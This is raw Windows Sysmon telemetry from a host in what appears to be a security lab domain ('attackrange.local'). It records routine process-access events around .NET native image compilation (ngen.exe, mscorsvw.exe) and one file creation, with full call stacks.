13:50:02.682{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8403-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.682{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8403-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.682{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8403-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.619{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8303-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.604{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8303-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.604{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8303-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8203-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.541{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8203-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.525{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8203-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8103-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.416{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8103-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.416{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8103-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.322{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8003-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.307{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8003-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.307{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8003-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.229{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-7F03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.197{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-7F03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.197{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-7F03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:02.104{59A5CD1D-9209-6005-7E03-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\127c-0\Microsoft.Internal.Tasks.Dataflow.dll2021-01-18 13:50:02.104 10341000x80000000000000007869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.978{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920B-6005-8B03-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.978{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920B-6005-8B03-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.244{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920B-6005-8A03-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.228{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920B-6005-8A03-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.228{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920B-6005-8A03-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscor